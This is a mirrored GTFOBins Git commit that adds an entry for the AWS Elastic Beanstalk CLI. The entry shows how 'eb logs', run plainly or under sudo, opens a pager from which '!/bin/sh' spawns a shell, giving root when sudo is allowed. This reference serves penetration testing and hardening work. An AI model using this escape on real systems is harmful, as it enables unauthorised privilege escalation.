mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add eb
This commit is contained in:
parent
b19420d1fd
commit
1b4e4ab15e
12
_gtfobins/eb.md
Normal file
12
_gtfobins/eb.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
eb logs
|
||||||
|
!/bin/sh
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo eb logs
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user